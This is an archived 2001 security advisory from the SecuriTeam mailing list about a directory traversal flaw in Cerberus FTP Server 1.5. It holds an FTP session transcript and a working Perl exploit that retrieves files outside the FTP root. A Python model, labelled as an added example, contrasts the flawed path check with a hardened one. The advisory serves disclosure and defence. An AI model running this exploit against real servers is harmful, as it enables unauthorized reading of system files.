[NT] Cerberus FTP Server Directory Traversal

From: support@securiteam.com
Date: 08/21/01


From: support@securiteam.com
To: list@securiteam.com
Subject: [NT] Cerberus FTP Server Directory Traversal
Message-Id: <20010821054442.05389138BF@mail.der-keiler.de>
Date: Tue, 21 Aug 2001 07:44:42 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Cerberus FTP Server Directory Traversal
------------------------------------------------------------------------

SUMMARY

 <http://www.greenepa.net/~averett/cerberus.htm> Cerberus FTP Server is a
multithreaded Windows FTP server designed to use little CPU and memory. A
security vulnerability in the product allows a remote FTP user (an anonymous
one, where anonymous login is enabled) to change directory and retrieve files
outside the configured FTP root directory.

DETAILS

Vulnerable systems:
Cerberus FTP Server version 1.5

Example:
220-Welcome to Cerberus FTP Server
220 Created by Grant Averett
User (192.168.0.2:(none)): anonymous
230 User anonymous logged in
ftp> ls
200 Port command received
150 Opening data connection
delphiown
226 Transfer complete
ftp: 11 bytes received in 0.00 seconds 11000.00KB/s
ftp> cd delphiown/../../
250 Change directory ok
ftp> ls
200 Port command received
150 Opening data connection

As the transcript shows, prefixing the "../.." sequence with the name of a
directory that really exists under the FTP root (here delphiown) is enough
to escape it. You therefore need at least one valid directory to break out
of the FTP root, which suggests that the server validates only the first
path component and hands the rest to the filesystem unchanged. A user who
is allowed to create a directory (MKD) can supply that prefix themselves,
which is what the exploit below falls back to.
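The following Python model is an added example and is not code from the advisory or from Cerberus FTP Server. The page does not show the server's actual check, so `vulnerable_resolve` is an assumed reconstruction that reproduces the observed behaviour (only the first path component is verified against a constructed set of directories, the remainder is joined verbatim), and `safe_resolve` shows the fix a practitioner would want: normalise the whole virtual path first, then require the result to be the root or strictly beneath it. The root path `/srv/ftp`, every directory name other than delphiown, and the function names are assumptions made for this example.

```python
import posixpath

# Constructed virtual layout standing in for the server's filesystem.
# The FTP root and the directory names (apart from delphiown, which appears
# in the advisory's transcript) are assumptions for this example.
FTP_ROOT = "/srv/ftp"
EXISTING_DIRS = {"/", "/srv", "/srv/ftp", "/srv/ftp/delphiown"}


def _split_request(cwd, requested):
    """Fold backslashes (Windows servers accept both separators) and decide
    whether the request is relative to the root or to the current directory."""
    req = requested.replace("\\", "/")
    if req.startswith("/"):
        return FTP_ROOT, req.lstrip("/")
    return cwd, req


def vulnerable_resolve(cwd, requested):
    """Assumed model of the flawed check: only the first path component is
    validated against the FTP root; the remainder is joined verbatim and the
    OS resolves the '..' segments.  Returns the directory the server would
    really land in, or None if the request is refused."""
    base, rel = _split_request(cwd, requested)
    first = rel.split("/", 1)[0]
    if first in ("", ".", ".."):
        return None                      # a bare '..' is refused ...
    if posixpath.join(base, first) not in EXISTING_DIRS:
        return None                      # ... and so is a non-existent prefix
    # but "delphiown/../.." passes and the OS walks above the root
    return posixpath.normpath(posixpath.join(base, rel))


def safe_resolve(cwd, requested):
    """Hardened check: normalise the whole virtual path first, then require
    the result to be the root itself or to lie strictly beneath it."""
    base, rel = _split_request(cwd, requested)
    real = posixpath.normpath(posixpath.join(base, rel))
    # The trailing "/" stops a sibling such as /srv/ftp2 from passing.
    if real != FTP_ROOT and not real.startswith(FTP_ROOT + "/"):
        return None
    return real


if __name__ == "__main__":
    for path in ("delphiown", "delphiown/../../", "../..", "delphiown\\..\\.."):
        print(f"{path!r:24} vulnerable -> {vulnerable_resolve(FTP_ROOT, path)!s:12} "
              f"safe -> {safe_resolve(FTP_ROOT, path)}")
```

On a real server the virtual-path check is only the first half: after it passes, canonicalise on the actual filesystem as well (realpath, or the Win32 equivalent) so that symbolic links or junctions inside the root cannot reopen the hole. The example stays a pure path model so that it runs offline.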

Solution:
No fix is available at the time of writing. The author was contacted on the
12th of August; no response was received.

Exploit:
#!/usr/bin/perl

# this exploit will download files from
# the ftp server, even if they are outside of
# root directory.

use strict;
use warnings;
use Net::FTP;

my $loginname = 'anonymous';
my $passwd    = '';

my $dirname = '';

print "\n-----------------------------------\n";
print "Cerberus Ftp server 1.5\n";
print "directory traversal exploit\n";
print "by Christoph Heindl\n";
print "se00020\@fhs-hagenberg.ac.at\n";
print "-----------------------------------\n";
if (!$ARGV[0] || !$ARGV[1]) {
    print "usage: cftpsploit.pl <host> <dir/file>\n";
    print " example: cftpsploit.pl 192.168.0.2 boot.ini\n";
    print " will download boot.ini from c:\\ if server is running on drive c\n";
    exit;
}

my $ipaddr = $ARGV[0];
my $ftp = Net::FTP->new($ipaddr, Timeout => 5)
    or die "\ncould not connect to $ipaddr: $@\n";
if (!$ftp->login($loginname, $passwd)) {
    die "\ncould not login: " . $ftp->message . "\n";
}

# The server only accepts a traversal that is prefixed with an existing
# directory, so look for any entry in the root listing we can CWD into.
print "searching for directory...";
foreach my $dir ($ftp->ls()) {
    next unless ($ftp->cwd($dir));
    $dirname = $dir;
    $ftp->cwd('..');
    last;
}
if ($dirname eq '') {
    print "failed\n";
    # No usable directory in the listing: try to create one (needs MKD rights).
    print "trying to create pseudo dir...";
    my $mkd = $ftp->mkdir('pseudo');
    if ($mkd) {
        print "ok\n";
        $dirname = "pseudo";
    }
    else {
        print "failed\n";
        print "exiting...\n";
        exit(0);
    }
}
print "found dir\n";
print "dirname is: " . $dirname . "\n";
# <dir>/../../ climbs one level above the FTP root. The boot.ini example
# assumes the root sits directly under c:\ (e.g. c:\ftproot); add more "../"
# if the root is nested deeper.
my $pathtofile = $dirname . "/../../";
print "getting file...\n";
$ftp->binary;
$ftp->get($pathtofile . $ARGV[1])
    or die "download failed: " . $ftp->message . "\n";
$ftp->quit;
print "all done. file located in current dir\n";

ADDITIONAL INFORMATION

The information has been provided by Christoph Heindl
<mailto:Christoph.Heindl@fhs-hagenberg.ac.at>.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.